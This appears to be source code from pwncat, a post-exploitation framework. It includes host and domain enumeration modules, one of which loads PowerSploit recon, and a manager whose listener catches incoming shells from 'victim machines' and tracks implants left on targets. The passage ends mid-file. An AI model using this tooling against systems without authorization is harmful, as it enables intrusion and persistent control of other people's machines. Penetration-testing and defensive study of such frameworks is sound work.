#!/usr/bin/env python3


from pwncat.facts import DistroVersionData
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import EnumerateModule


class Module(EnumerateModule):
    """
    Enumerate OS/Distribution version information
    """

    PROVIDES = ["system.distro"]
    PLATFORM = [Linux]

    def enumerate(self, session):

        build_id = None
        pretty_name = None
        ident = None
        version = None

        try:
            with session.platform.open("/etc/os-release", "r") as filp:
                for line in filp:
                    line = line.strip()
                    if line.startswith("PRETTY_NAME="):
                        pretty_name = line.split("=")[1].strip('"')
                    elif line.startswith("BUILD_ID="):
                        build_id = line.split("=")[1].strip('"')
                    elif line.startswith("ID="):
                        ident = line.split("=")[1].strip('"')
                    elif line.startswith("VERSION_ID="):
                        version = line.split("=")[1].strip('"')
        except (PermissionError, FileNotFoundError):
            pass

        if version is None:
            try:
                with session.platform.open("/etc/lsb-release", "r") as filp:
                    for line in filp:
                        if line.startswith("LSB_VERSION="):
                            version = line.split("=")[1].strip('"')
                            break
            except (PermissionError, FileNotFoundError):
                pass

        if (
            pretty_name is None
            and build_id is None
            and ident is None
            and version is None
        ):
            return

        yield DistroVersionData(self.name, pretty_name, ident, build_id, version)



#!/usr/bin/env python3

import rich.markup

from pwncat.db import Fact
from pwncat.subprocess import CalledProcessError
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule


class InterfaceData(Fact):
    def __init__(self, source, interface, address):
        super().__init__(source=source, types=["system.network.interface"])

        self.interface: str = interface
        self.address: str = address

    def title(self, session):
        return f"Interface [cyan]{rich.markup.escape(self.interface)}[/cyan] w/ address [blue]{rich.markup.escape(self.address)}[/blue]"


class Module(EnumerateModule):
    """
    Enumerate network interfaces with active connections
    and return their name and IP address.
    """

    PLATFORM = [Linux]
    SCHEDULE = Schedule.ONCE
    PROVIDES = ["system.network.interface"]

    def enumerate(self, session):

        try:
            output = session.platform.run(
                ["ip", "-c=never", "addr"], capture_output=True, text=True, check=True
            )
        except CalledProcessError:
            try:
                output = session.platform.run(
                    ["ip", "addr"], capture_output=True, text=True, check=True
                )
            except CalledProcessError:
                return
        except FileNotFoundError:
            return

        if output.stdout:
            output = (
                line for line in output.stdout.replace("\r\n", "\n").split("\n") if line
            )

            interface = None

            for line in output:
                if not line.startswith(" "):
                    interface = line.split(":")[1].strip()
                    continue

                if interface is None:
                    # This shouldn't happen. The first line should be an interface
                    # definition, but just in case
                    continue

                line = line.strip()
                if line.startswith("inet"):
                    address = line.split(" ")[1]
                    yield InterfaceData(self.name, interface, address)



#!/usr/bin/env python3
from typing import Dict, List, Optional

import pwncat
from pwncat.modules import Status
from pwncat.facts.windows import WindowsGroup
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import Schedule, EnumerateModule


class DomainGroup(WindowsGroup):
    """Builds on Windows Groups to add domain specific information"""

    def __init__(self, source: str, domain: str, data: Dict, members: List[str]):
        super().__init__(
            source=source,
            name=data["samaccountname"],
            gid=data["objectsid"],
            description=data.get("description"),
            principal_source=None,
            domain=domain,
            members=members,
        )

        self.types.append("domain.group")

        self.grouptype: int = data.get("grouptype") or 0
        self.samaccounttype: int = data.get("samaccounttype") or 0
        self.objectclass: List[str] = data.get("objectclass") or []
        self.cn: str = data.get("cn") or None
        self.distinguishedname: Optional[str] = data.get("distinguishedname") or None
        self.objectcategory: str = data.get("objectcategory")

    def title(self, session: "pwncat.manager.Session"):

        members = []
        for uid in self.members:
            user = session.find_user(uid=uid)
            if user is None:
                user = session.find_group(gid=uid)

            if user is None:
                members.append(f"UID({repr(uid)})")
            else:
                members.append(user.name)

        return f"""DomainGroup(gid={repr(self.id)}, name={repr(self.name)}, domain={repr(self.domain)}, members={repr(members)})"""


class Module(EnumerateModule):
    """Retrieve information on all domain computers"""

    PLATFORM = [Windows]
    PROVIDES = ["domain.group", "group"]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session: "pwncat.manager.Session"):
        """Perform enumeration"""

        # Check that we are in a domain
        if not session.run("enumerate", types=["domain.details"]):
            return

        # Ensure we have PowerView loaded
        yield Status("loading powersploit recon")
        session.run("powersploit", group="recon")

        try:
            domain = session.run("enumerate.domain")[0]
        except IndexError:
            # Not a domain joined machine
            return

        try:
            yield Status("requesting domain groups")
            groups = session.platform.powershell("Get-DomainGroup")[0]
        except (IndexError, PowershellError):
            # Doesn't appear to be a domain joined group
            return

        if isinstance(groups, dict):
            groups = [groups]

        for group in groups:

            try:
                yield Status(
                    f"[cyan]{group['samaccountname']}[/cyan]: requesting members"
                )
                members = session.platform.powershell(
                    f"Get-DomainGroupMember \"{group['samaccountname']}\""
                )[0]

                if isinstance(members, dict):
                    members = [members]

            except (IndexError, PowershellError):
                members = []

            members = [member["MemberSID"] for member in members]

            yield DomainGroup(
                self.name, domain=domain["Name"], data=group, members=members
            )



"""
The manager is the core object within pwncat. A manager is responsible for maintaining
configuration, terminal state, and maintaining all active pwncat sessions. A manager
can have zero or more sessions active at any given time. It is recommended to create
a manager through the context manager syntax. In this way, pwncat will automatically
disconnect from active sessions and perform any required cleanup prior to exiting
even if there was an uncaught exception. The normal method of creating a manager is:

.. code-block:: python

    with pwncat.manager.Manager() as manager:
        # Do something with your manager, like set a configuration item
        # or open a connection
        session = manager.create_session(platform="linux", host="192.168.1.1", port=4444)

Listeners
---------

The pwncat manager provides the ability to create background listeners. Background
listeners are classes which inherit from :class:`threading.Thread`. To create a new
listener, you can use the :func:`pwncat.manager.Manager.create_listener` method. To
get an asynchronous notification of new sessions, you can use the ``established``
callback which receives the new session as an argument.

"""
import os
import ssl
import sys
import queue
import signal
import socket
import fnmatch
import pkgutil
import datetime
import tempfile
import threading
import contextlib
from io import TextIOWrapper
from enum import Enum, auto
from typing import Dict, List, Tuple, Union, Callable, Optional, Generator

import ZODB
import zodburi
import rich.progress
import persistent.list
from cryptography import x509
from cryptography.x509.oid import NameOID
from prompt_toolkit.shortcuts import confirm
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa

import pwncat.db
import pwncat.facts
import pwncat.modules
import pwncat.modules.enumerate
from pwncat.util import RawModeExit, console
from pwncat.config import Config
from pwncat.target import Target
from pwncat.channel import Channel, ChannelError, ChannelClosed
from pwncat.commands import CommandParser
from pwncat.platform import Platform, PlatformError
from pwncat.modules.enumerate import Scope


class InteractiveExit(Exception):
    """Indicates we should exit the interactive terminal"""


class ListenerError(Exception):
    """Raised by utility functions within the listener class.
    This is never raised in the main thread, and is only used
    to consolidate errors from various socket and ssl libraries
    when setting up and operating the listener."""


class ListenerState(Enum):
    """Background listener state"""

    STOPPED = auto()
    """ The listener is not started """
    RUNNING = auto()
    """ The listener is running """
    FAILED = auto()
    """ The listener encountered an exception and is in a failed state """


class Listener(threading.Thread):
    """Background Listener which acts as a factory constructing sessions
    in the background. Listeners should not be created directly. Rather,
    you should use the :func:`pwncat.manager.Manager.create_listener` method.

    .. code-block:: python
        :caption: Using a background listener

        def new_session(session: pwncat.manager.Session):
            # Returning false causes the session to be removed immediately
            return True

        with Manager() as manager:
            listener = manager.create_listener(
                port=4444,
                platform="linux",
                ssl=True,
                established=new_session,
            )
            # You can also stop the listener
            # listener.stop()
            manager.interactive()
    """

    def __init__(
        self,
        manager: "Manager",
        address: Tuple[str, int],
        protocol: str = "socket",
        platform: Optional[str] = None,
        count: Optional[int] = None,
        established: Optional[Callable[["Session"], bool]] = None,
        ssl: bool = False,
        ssl_cert: Optional[str] = None,
        ssl_key: Optional[str] = None,
    ):
        super().__init__(daemon=True)

        self.manager: "Manager" = manager
        """ The controlling manager object """
        self.address: Tuple[str, int] = address
        """ The address to bind our listener to on the attacking machine """
        self.protocol: str = protocol
        """ Name of the channel protocol to use for incoming connections """
        self.platform: Optional[str] = platform
        """ The platform to use when automatically establishing sessions """
        self.count: Optional[int] = count
        """ The number of connections to receive before exiting """
        self.established: Optional[Callable[["Session"], bool]] = established
        """ A callback used when a new session is established """
        self.ssl: bool = ssl
        """ Whether to wrap the listener in SSL """
        self.ssl_cert: Optional[str] = ssl_cert
        """ The SSL server certificate """
        self.ssl_key: Optional[str] = ssl_key
        """ The SSL server key """
        self.state: ListenerState = ListenerState.STOPPED
        """ The current state of the listener; only set internally """
        self.failure_exception: Optional[Exception] = None
        """ An exception which was caught and put the listener in ListenerState.FAILED state """
        self._stop_event: threading.Event = threading.Event()
        """ An event used to signal the listener to stop """
        self._session_queue: queue.Queue = queue.Queue()
        """ Queue of newly established sessions. If this queue fills up, it is drained automatically. """
        self._channel_queue: queue.Queue = queue.Queue()
        """ Queue of channels waiting to be initialized in the case of an unidentified platform """
        self._session_lock: threading.Lock = threading.Lock()

    def __str__(self):
        return f"[blue]{self.address[0]}[/blue]:[cyan]{self.address[1]}[/cyan]"

    @property
    def pending(self) -> int:
        """Retrieve the number of pending channels"""

        return self._channel_queue.qsize()

    def iter_sessions(
        self, count: Optional[int] = None
    ) -> Generator["Session", None, None]:
        """
        Synchronously iterate over new sessions. This generated will
        yield sessions until no more sessions are found on the queue.
        However, more sessions may be added after iterator (or while
        iterating) over this generator. Reaching the end of this list
        when count=None does not indicate that the listener has stopped.

        :param count: the number of sessions to retreive or None for infinite
        :type count: Optional[int]
        :rtype: Generator[Session, None, None]
        """

        while True:
            if count is not None and count <= 0:
                break

            try:
                yield self._session_queue.get(block=False, timeout=None)
                if count is not None:
                    count -= 1
            except queue.Empty:
                return

    def iter_channels(
        self, count: Optional[int] = None
    ) -> Generator["Channel", None, None]:
        """
        Synchronously iterate over new channels. This generated will
        yield channels until no more channels are found on the queue.
        However, more channels may be added after iterator (or while
        iterating) over this generator. Reaching the end of this list
        when count=None does not indicate that the listener has stopped.

        :param count: number of channels to receive or None for infinite
        :type count: Optional[int]
        :rtype: Generator[Channel, None, None]
        """

        while True:
            if count is not None and count <= 0:
                break

            try:
                yield self._channel_queue.get(block=False, timeout=None)
                if count is not None:
                    count -= 1
            except queue.Empty:
                return

    def bootstrap_session(
        self,
        channel: pwncat.channel.Channel,
        platform: str,
        _queue_message: bool = False,
    ) -> "pwncat.manager.Session":
        """
        Establish a session from an existing channel using the specified platform.
        If platform is None, then the given channel is placed onto the uninitialized
        channel queue for later initialization.

        :param channel: the channel to initialize
        :type channel: pwncat.channel.Channel
        :param platform: name of the platform to initialize
        :type platform: Optional[str]
        :param _queue_message: only used internally to show unitialized channel message (default: False)
        :type _queue_message: bool
        :rtype: pwncat.manager.Session
        :raises:
            ListenerError: incorrect platform or channel disconnected
        """

        with self._session_lock:

            if self.count is not None and self.count <= 0:
                raise ListenerError("listener max connections reached")

            if (
                self.manager.target is not None
                and self.manager.target.platform.interactive
            ):
                # Throw a newline out there to clear up the output a bit
                print("\r", end="\n")

            if platform is None:
                # We can't initialize this channel, so we just throw it on the queue
                self._channel_queue.put_nowait(channel)
                self.manager.log(
                    f"[magenta]listener[/magenta]: {str(self)}: queuing pending channel: {channel} ({self._channel_queue.qsize()} pending)"
                )
                return None

            try:
                session = self.manager.create_session(
                    platform=platform,
                    channel=channel,
                    active=False,
                )

                self.manager.log(
                    f"[magenta]listener[/magenta]: [blue]{self.address[0]}[/blue]:[cyan]{self.address[1]}[/cyan]: {platform} session from {channel} established"
                )

                # Call established callback for session notification
                if self.established is not None and not self.established(session):
                    # The established callback can decide to ignore an established session
                    session.close()
                    return None

                # Queue the session. This is an obnoxious loop, but
                # basically, we attempt to queue the session, and if
                # the queue is full, we remove a queued session, and
                # retry. We keep doing this until it works. This is
                # fine because the queue is just for notification
                # purposes, and the sessions are already tracked by
                # the manager.
                while True:
                    try:
                        self._session_queue.put_nowait(session)
                        break
                    except queue.Full:
                        try:
                            self._session_queue.get_nowait()
                        except queue.Empty:
                            pass

                if self.count is not None:
                    self.count -= 1
                    if self.count <= 0:
                        # Drain waiting channels
                        self.manager.log(
                            "[magenta]listener[/magenta]: [blue]{self.address[0]}[/blue]:[cyan]{self.address[0]}[/cyan]: max session count reached; shutting down"
                        )
                        self._stop_event.set()

                return session
            except (PlatformError, ChannelError) as exc:
                raise ListenerError(str(exc)) from exc

    def stop(self):
        """Stop the listener"""

        with self._session_lock:
            self.count = 0
            self._stop_event.set()

        self.join()

    def run(self):
        """Execute the listener in the background. We have to be careful not
        to trip up the manager, as this is running in a background thread."""

        try:
            raw_server = None
            server = None

            # Start the listener and wrap in the SSL context
            raw_server = self._open_socket()
            server = self._ssl_wrap(raw_server)

            # Set a short timeout so we don't block the thread
            server.settimeout(1)

            self.state = ListenerState.RUNNING

            while not self._stop_event.is_set():
                try:
                    # Accept a new client connection
                    client, address = server.accept()
                except socket.timeout:
                    # No connection, loop and check if we've been stopped
                    continue

                channel = None

                try:
                    # Construct a channel around the raw client
                    channel = self._bootstrap_channel(client)

                    # If we know the platform, create the session
                    self.bootstrap_session(channel, platform=self.platform)
                except ListenerError as exc:
                    # this connection didn't establish; log it
                    self.manager.log(
                        f"[magenta]listener[/magenta]: [blue]{self.address[0]}[/blue]:[cyan]{self.address[1]}[/cyan]: connection from [blue]{address[0]}[/blue]:[cyan]{address[1]}[/cyan] aborted: {exc}"
                    )

                    if channel is not None:
                        channel.close()
                    else:
                        # Close the socket
                        client.close()

            self.state = ListenerState.STOPPED

        except Exception as exc:
            self.state = ListenerState.FAILED
            self.failure_exception = exc
            self._stop_event.set()
        finally:
            self._close_socket(raw_server, server)

            if self.count is not None and self.count <= 0:
                try:
                    # Drain waiting channels
                    while True:
                        self._channel_queue.get_nowait().close()
                except queue.Empty:
                    pass

    def _open_socket(self) -> socket.socket:
        """Open the raw socket listener and return the new socket object"""

        # Create a listener
        try:
            server = socket.create_server(
                self.address, reuse_port=True, backlog=self.count
            )

            return server
        except socket.error as exc:
            raise ListenerError(str(exc))

    def _ssl_wrap(self, server: socket.socket) -> ssl.SSLSocket:
        """Wrap the given server socket in an SSL context and return the new socket.
        If the ``ssl`` option is not set, this method simply returns the original socket."""

        if not self.ssl:
            return server

        if self.ssl_cert is None and self.ssl_key is not None:
            self.ssl_cert = self.ssl_key
        if self.ssl_key is None and self.ssl_cert is not None:
            self.ssl_key = self.ssl_cert

        if self.ssl_cert is None or self.ssl_key is None:
            with tempfile.NamedTemporaryFile("wb", delete=False) as filp:
                self.manager.log(
                    f"generating self-signed certificate at {repr(filp.name)}"
                )

                key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
                filp.write(
                    key.private_bytes(
                        encoding=serialization.Encoding.PEM,
                        format=serialization.PrivateFormat.TraditionalOpenSSL,
                        encryption_algorithm=serialization.NoEncryption(),
                    )
                )

                # Literally taken from: https://cryptography.io/en/latest/x509/tutorial/
                subject = issuer = x509.Name(
                    [
                        x509.NameAttribute(NameOID.COUNTRY_NAME, "US"),
                        x509.NameAttribute(NameOID.COUNTRY_NAME, "US"),
                        x509.NameAttribute(
                            NameOID.STATE_OR_PROVINCE_NAME, "California"
                        ),
                        x509.NameAttribute(NameOID.LOCALITY_NAME, "San Francisco"),
                        x509.NameAttribute(NameOID.ORGANIZATION_NAME, "My Company"),
                        x509.NameAttribute(NameOID.COMMON_NAME, "mysite.com"),
                    ]
                )
                cert = (
                    x509.CertificateBuilder()
                    .subject_name(subject)
                    .issuer_name(issuer)
                    .public_key(key.public_key())
                    .serial_number(x509.random_serial_number())
                    .not_valid_before(datetime.datetime.utcnow())
                    .not_valid_after(
                        datetime.datetime.utcnow() + datetime.timedelta(days=365)
                    )
                    .add_extension(
                        x509.SubjectAlternativeName([x509.DNSName("localhost")]),
                        critical=False,
                    )
                    .sign(key, hashes.SHA256())
                )

                filp.write(cert.public_bytes(serialization.Encoding.PEM))

                self.ssl_cert = filp.name
                self.ssl_key = filp.name

        try:
            context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
            context.load_cert_chain(self.ssl_cert, self.ssl_key)

            return context.wrap_socket(server)
        except ssl.SSLError as exc:
            raise ListenerError(str(exc))

    def _close_socket(self, raw_server: socket.socket, server: socket.socket):
        """Close the listener socket"""

        if server is not raw_server and server is not None:
            server.close()

        if raw_server is not None:
            raw_server.close()

    def _bootstrap_channel(self, client: socket.socket) -> "pwncat.channel.Channel":
        """
        Create a channel with the listener parameters around the socket.

        :param client: a newly established client socket
        :type client: socket.socket
        :rtype: pwncat.channel.Channel
        """

        try:
            channel = pwncat.channel.create(protocol=self.protocol, client=client)
        except ChannelError as exc:
            raise ListenerError(str(exc))

        return channel


class Session:
    """This class represents the container by which ``pwncat`` references
    connections to victim machines. It glues together a connected ``Channel``
    and an appropriate ``Platform`` implementation. It also provides generic
    access to the ``pwncat`` database and logging functionality."""

    def __init__(
        self,
        manager,
        platform: Union[str, Platform],
        channel: Optional[Channel] = None,
        active: bool = True,
        **kwargs,
    ):
        self.id = manager.session_id
        self.manager = manager
        self.background = None
        self._db_session = None
        self.db = manager.db.open()
        self.module_depth = 0
        self.showing_progress = True
        self.layers = []
        self.enumerate_state = {}
        self.facts = []

        self._progress = None

        # If necessary, build a new platform object
        if isinstance(platform, Platform):
            self.platform = platform
        else:
            # If necessary, build a new channel
            if channel is None:
                channel = pwncat.channel.create(**kwargs)

            # This makes logging work during the constructor
            self.platform = str(channel)

            self.platform = pwncat.platform.find(platform)(
                self,
                channel,
                log=self.config.get("log", None),
                verbose=self.config.get("verbose", False),
            )

        # Register this session with the manager
        self.manager.sessions[self.id] = self

        if active or self.manager.target is None:
            self.manager.target = self

        # Initialize the host reference
        self.hash = self.platform.get_host_hash()

        if self.target is None:
            self.register_new_host()
        else:
            self.log("loaded known host from db")

        self.platform.get_pty()

        # Register this session with the manager
        # some of the methods used above can raise an exception
        # and we will register this session only when everything goes well
        self.manager.sessions[self.id] = self
        self.manager.target = self

    @property
    def config(self):
        """Get the configuration object for this manager. This
        is simply a wrapper for session.manager.config to make
        accessing configuration a little easier."""
        return self.manager.config

    @property
    def target(self) -> Target:
        """Retrieve the target object for this session"""

        try:
            # Find target object
            return next(t for t in self.db.root.targets if t.guid == self.hash)
        except StopIteration:
            return None

    def register_new_host(self):
        """Register a new host in the database. This assumes the
        hash has already been stored in ``self.hash``"""

        # Create a new target descriptor
        target = Target()
        target.guid = self.hash
        target.public_address = (self.platform.channel.host, self.platform.channel.port)
        target.platform = self.platform.name

        # Add the target to the database
        self.db.transaction_manager.begin()
        self.db.root.targets.append(target)
        self.db.transaction_manager.commit()

        self.log("registered new host w/ db")

    def current_user(self) -> pwncat.facts.User:
        """Retrieve the current user object"""

        return self.find_user(uid=self.platform.getuid())

    def find_user(self, uid=None, name=None):
        """Locate a user object by name or ID"""

        for user in self.run("enumerate.gather", progress=False, types=["user"]):
            if (uid is None or user.id == uid) and (name is None or user.name == name):
                return user

    def iter_users(self):
        """Iterate over the users for the target"""

        yield from self.run("enumerate.gather", progress=False, types=["user"])

    def find_group(self, gid=None, name=None):
        """Locate a user object by name or ID"""

        for group in self.run("enumerate.gather", progress=False, types=["group"]):
            if (gid is None or group.id == gid) and (
                name is None or group.name == name
            ):
                return group

    def iter_groups(self, members: Optional[List[Union[str, int]]] = None):
        """Iterate over groups for the target"""

        for group in self.run("enumerate.gather", progress=False, types=["group"]):
            if members is None or any(m in group.members for m in members):
                yield group

    def register_fact(
        self,
        fact: "pwncat.db.Fact",
        scope: Scope = Scope.HOST,
        commit: bool = False,
    ):
        """Register a fact with this session's target. This is useful when
        a fact is generated during execution of a command or module, but is
        not associated with a specific enumeration module. It can still be
        queried with the base `enumerate` module by it's type."""

        if scope is Scope.HOST and fact not in self.target.facts:
            self.target.facts.append(fact)
            if commit:
                self.db.transaction_manager.commit()
        elif scope is Scope.SESSION and fact not in self.facts:
            self.facts.append(fact)

    def run(self, module: str, **kwargs):
        """Run a module on this session"""

        module_name = module
        module = self.manager.modules.get(module_name)
        if module is None:
            module = self.manager.modules.get(self.platform.name + "." + module_name)
        if module is None:
            module = self.manager.modules.get("agnostic." + module_name)
        if module is None:
            raise pwncat.modules.ModuleNotFound(module_name)

        if module.PLATFORM is not None and type(self.platform) not in module.PLATFORM:
            raise pwncat.modules.IncorrectPlatformError(module_name)

        return module.run(self, **kwargs)

    def find_module(self, pattern: str, base=None, exact: bool = False):
        """Locate a module by a glob pattern. This is an generator
        which may yield multiple modules that match the pattern and
        base class."""

        if base is None:
            base = pwncat.modules.BaseModule

        for name, module in self.manager.modules.items():
            if (
                module.PLATFORM is not None
                and type(self.platform) not in module.PLATFORM
            ):
                continue
            if not issubclass(type(module), base):
                continue
            if not exact:
                if (
                    fnmatch.fnmatch(name, pattern)
                    or fnmatch.fnmatch(name, f"agnostic.{pattern}")
                    or fnmatch.fnmatch(name, f"{self.platform.name}.{pattern}")
                ):
                    yield module
            elif exact:
                if (
                    name == pattern
                    or name == f"agnostic.{pattern}"
                    or name == f"{self.platform.name}.{pattern}"
                ):
                    yield module

    def log(self, *args, **kwargs):
        """Log to the console. This utilizes the active sessions
        progress instance to log without messing up progress output
        from other sessions, if we aren't active."""

        self.manager.log(f"{self.platform}:", *args, **kwargs)

    def print(self, *args, **kwargs):
        """Log to the console. This utilizes the active sessions
        progress instance to log without messing up progress output
        from other sessions, if we aren't active."""

        self.manager.print(f"{self.platform}:", *args, **kwargs)

    @contextlib.contextmanager
    def task(self, *args, **kwargs):
        """Get a new task in this session's progress instance"""

        # Ensure the variable exists even if an exception happens
        # prior to task creation
        task = None
        started = self._progress is not None  # ._started

        if "status" not in kwargs:
            kwargs["status"] = "..."

        kwargs["platform"] = str(self.platform)

        try:
            # Ensure this bar is started if we are the selected
            # target.
            if not started:
                self._progress = rich.progress.Progress(
                    "{task.fields[platform]}",
                    "•",
                    "{task.description}",
                    "•",
                    "{task.fields[status]}",
                    transient=True,
                    console=console,
                )
                self._progress.start()

            # Create the new task
            task = self._progress.add_task(*args, **kwargs)
            yield task
        finally:
            # If the progress wasn't started when we entered,
            # ensure it is stopped before we leave. This allows
            # nested tasks.
            if not started:
                self._progress.stop()
                if task is not None:
                    self._progress.remove_task(task)
                self._progress = None
            elif task is not None:
                self._progress.remove_task(task)

    def update_task(self, task, *args, **kwargs):
        """Update an active task"""

        self._progress.update(task, *args, **kwargs)

    def died(self):

        if self.id not in self.manager.sessions:
            return

        del self.manager.sessions[self.id]

        if self.manager.target == self:
            self.manager.target = None

    def close(self):
        """Close the session and remove from manager tracking"""

        tampers = self.run("enumerate", types=["tamper"], progress=False)
        implants = self.run("enumerate", types=["implant.*"], progress=False)

        if tampers:
            self.log("Leaving behind the following tampers:")
            for tamper in tampers:
                self.log(f"  - {tamper.title(self)}")

        if implants:
            self.log("Leaving behind the following implants:")
            for implant in implants:
                self.log(f"  - {implant.title(self)}")

        # Unwrap all layers in the session
        while self.layers:
            self.layers.pop()(self)

        try:
            self.platform.exit()
            self.platform.channel.close()
        except (PlatformError, ChannelError) as exc:
            self.log(
                f"[yellow]warning[/yellow]: unexpected exception while closing: {exc}"
            )

        self.died()

    def __enter__(self):

        return self

    def __exit__(self, _, __, ___):

        self.close()


class Manager:
    """
    ``pwncat`` manager which is responsible for creating channels,
    and sessions, managing the database sessions. It provides the
    factory functions for generating platforms, channels, database
    sessions, and executing modules.
    """

    def __init__(self, config: str = None):
        self.config = Config()
        self.session_id = 0  # start with 0-indexed session IDs
        self.sessions: Dict[int, Session] = {}
        self.modules: Dict[str, pwncat.modules.BaseModule] = {}
        self._target = None
        self.parser = CommandParser(self)
        self.interactive_running = False
        self.db: ZODB.DB = None
        self.listeners: List[Listener] = []

        # This is needed because pwntools captures the terminal...
        # there's no way officially to undo it, so this is a nasty
        # hack. You can't use pwntools output after creating a manager.
        self._patch_pwntools()

        # Load standard modules
        self.load_modules(*pwncat.modules.__path__)

        # Get our data directory
        data_home = os.environ.get("XDG_DATA_HOME", "~/.local/share")
        if not data_home:
            data_home = "~/.local/share"

        # Expand the user path
        data_home = os.path.expanduser(os.path.join(data_home, "pwncat"))

        # Find modules directory
        modules_dir = os.path.join(data_home, "modules")

        # Load local modules if they exist
        if os.path.isdir(modules_dir):
            self.load_modules(modules_dir)

        # Load global configuration script, if available
        try:
            with open("/etc/pwncat/pwncatrc") as filp:
                self.parser.eval(filp.read(), "/etc/pwncat/pwncatrc")
        except (FileNotFoundError, PermissionError):
            pass

        # Load user configuration script
        user_rc = os.path.join(data_home, "pwncatrc")
        try:
            with open(user_rc) as filp:
                self.parser.eval(filp.read(), user_rc)
        except (FileNotFoundError, PermissionError):
            pass

        # Load local configuration script
        if isinstance(config, str):
            with open(config) as filp:
                self.parser.eval(filp.read(), config)
        elif config is not None:
            self.parser.eval(config.read(), getattr(config, "name", "fileobj"))
            config.close()
        else:
            try:
                # If no config is specified, attempt to load `./pwncatrc`
                # but don't fail if it doesn't exist.
                with open("./pwncatrc") as filp:
                    self.parser.eval(filp.read(), "./pwncatrc")
            except (FileNotFoundError, PermissionError):
                pass

        if self.db is None:
            self.open_database()

    def __enter__(self):
        """Begin manager context tracking"""

        return self

    def __exit__(self, _, __, ___):
        """Ensure all sessions are closed"""

        # Retrieve the existing session IDs list
        session_ids = list(self.sessions.keys())

        # Close each session based on its ``session_id``
        for session_id in session_ids:
            self.sessions[session_id].close()

    def open_database(self):
        """Create the internal engine and session builder
        for this manager based on the configured database"""

        if self.sessions and self.db is not None:
            raise RuntimeError("cannot change database after sessions are established")

        # Connect/open the database
        factory_class, factory_args = zodburi.resolve_uri(self.config["db"])
        storage = factory_class()
        self.db = ZODB.DB(storage, **factory_args)

        conn = self.db.open()

        if not hasattr(conn.root, "targets"):
            conn.root.targets = persistent.list.PersistentList()

        if not hasattr(conn.root, "history"):
            conn.root.history = persistent.list.PersistentList()

        conn.transaction_manager.commit()
        conn.close()

        # Rebuild the command parser now that the database is available
        self.parser = CommandParser(self)

    def create_db_session(self):
        """Create a new SQLAlchemy database session and return it"""

        # Initialize a fallback database if needed
        if self.db is None:
            self.config.set("db", "memory://", glob=True)
            self.open_database()

        return self.db.open()

    def load_modules(self, *paths):
        """Dynamically load modules from the specified paths

        If a module has the same name as an already loaded module, it will
        take it's place in the module list. This includes built-in modules.
        """

        for loader, module_name, _ in pkgutil.walk_packages(
            paths, prefix="pwncat.modules."
        ):

            # Why is this check *not* part of pkgutil??????? D:<
            if module_name not in sys.modules:
                module = loader.find_module(module_name).load_module(module_name)
            else:
                module = sys.modules[module_name]

            if getattr(module, "Module", None) is None:
                continue

            # Create an instance of this module
            module_name = module_name.split("pwncat.modules.")[1]
            self.modules[module_name] = module.Module()

            # Store it's name so we know it later
            setattr(self.modules[module_name], "name", module_name)

    def log(self, *args, **kwargs):
        """Output a log entry"""

        if self.target is not None and self.target._progress is not None:
            self.target._progress.log(*args, **kwargs)
        else:
            console.log(*args, **kwargs)

    def print(self, *args, **kwargs):

        if self.target is not None and self.target._progress is not None:
            self.target._progress.print(*args, **kwargs)
        else:
            console.print(*args, **kwargs)

    @property
    def target(self) -> Session:
        """Retrieve the currently focused target"""
        return self._target

    @target.setter
    def target(self, value: Session):
        if value is not None and value not in self.sessions.values():
            raise ValueError("invalid target")
        self._target = value

    def _patch_pwntools(self):
        """This method patches stdout and stdin and sys.exchook
        back to their original contents temporarily in order to
        interact properly with pwntools. You must complete all
        pwntools progress items before calling this. It attempts to
        remove all the hooks placed into stdio by pwntools."""

        pwnlib = None

        # We only run this if pwnlib is loaded
        if "pwnlib" in sys.modules:
            pwnlib = sys.modules["pwnlib"]

        if pwnlib is None or not pwnlib.term.term_mode:
            return

        sys.stdout = sys.stdout._fd
        sys.stdin = sys.stdin._fd
        # I don't know how to get the old hook back...
        sys.excepthook = lambda _, __, ___: None
        pwnlib.term.term_mode = False

    def interactive(self):
        """Start interactive prompt"""

        self.interactive_running = True

        # This is required to ensure multi-byte key-sequences are read
        # properly
        sys.stdin
        sys.stdin = TextIOWrapper(
            os.fdopen(sys.stdin.fileno(), "br", buffering=0),
            write_through=True,
            line_buffering=True,
        )

        while self.interactive_running:

            try:

                # This is it's own main loop that will continue until
                # it catches a C-d sequence.
                try:
                    self.parser.run()
                except InteractiveExit:

                    if self.sessions and not confirm(
                        "There are active sessions. Are you sure?"
                    ):
                        continue

                    cancel = False

                    for listener in self.listeners:
                        if listener.pending and not confirm(
                            "There are pending channels. Are you sure?"
                        ):
                            cancel = True
                            break
                        elif listener.pending:
                            break

                    if cancel:
                        continue

                    self.log("closing interactive prompt")
                    break

                # We can't enter raw mode without a session
                if self.target is None:
                    self.log("no active session, returning to local prompt")
                    continue

                interactive_complete = threading.Event()
                output_thread = None

                def output_thread_main(
                    target: Session, exception_queue: queue.SimpleQueue
                ):

                    while not interactive_complete.is_set():
                        try:
                            data = target.platform.channel.recv(4096)

                            if data != b"" and data is not None:
                                data = target.platform.process_output(data)
                                sys.stdout.buffer.write(data)
                                sys.stdout.buffer.flush()
                            else:
                                interactive_complete.wait(timeout=0.1)

                        except ChannelError as exc:
                            exception_queue.put(exc)
                            interactive_complete.set()
                            # This is a hack to get the interactive loop out of a blocking
                            # read call. The interactive loop will receive a KeyboardInterrupt
                            os.kill(os.getpid(), signal.SIGINT)
                        except RawModeExit:
                            interactive_complete.set()
                            os.kill(os.getpid(), signal.SIGINT)

                try:
                    self.target.platform.interactive = True

                    exception_queue = queue.Queue(maxsize=1)
                    output_thread = threading.Thread(
                        target=output_thread_main, args=[self.target, exception_queue]
                    )
                    output_thread.start()

                    try:
                        self.target.platform.interactive_loop(interactive_complete)
                    except RawModeExit:
                        interactive_complete.set()

                    try:
                        raise exception_queue.get(block=False)
                    except queue.Empty:
                        pass

                    self.target.platform.interactive = False
                except ChannelClosed:
                    self.log(
                        f"[yellow]warning[/yellow]: {self.target.platform}: connection reset"
                    )
                    self.target.died()
                finally:
                    interactive_complete.set()
                    if output_thread is not None:
                        output_thread.join()
                        output_thread.join()
            except:  # noqa: E722
